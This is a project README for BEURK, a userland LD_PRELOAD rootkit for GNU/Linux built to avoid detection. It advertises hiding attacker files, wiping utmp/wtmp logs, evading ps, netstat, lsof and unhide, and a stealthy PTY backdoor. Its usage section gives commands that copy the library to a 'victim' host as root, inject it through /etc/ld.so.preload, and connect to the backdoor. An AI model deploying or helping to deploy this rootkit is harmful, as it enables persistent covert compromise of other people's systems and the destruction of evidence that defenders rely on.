/beurk

BEURK Experimental Unix RootKit

Primary LanguageCGNU General Public License v3.0GPL-3.0

BEURK

Getting Started | API Documentation | Contributing | TODO List

Travis Build Ready Issues Coverage Status Jenkins Build Join the chat at https://gitter.im/unix-thrust/beurk

BEURK is an userland preload rootkit for GNU/Linux, heavily focused around anti-debugging and anti-detection.

S'ils savaient, ils vomiraient ...

- The core team -


Features

  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking undermines local sniffers
  • PAM backdoor for local privilege escalation

Usage

  • Compile
    git clone https://github.com/unix-thrust/beurk.git
    cd beurk
    make
  • Install
    scp libselinux.so root@victim.com:/lib/
    ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload'
  • Enjoy !
    ./client.py victim_ip:port # connect with furtive backdoor

Dependencies

The following packages are not required in order to build BEURK at the moment:

  • libpcap - to avoid local sniffing
  • libpam - for local PAM backdoor
  • libssl - for encrypted backdoor connection

Example on debian:

    apt-get install libpcap-dev libpam-dev libssl-dev

Waffle metrics

NOTE: BEURK is a recursive acronym for BEURK Experimental Unix Root Kit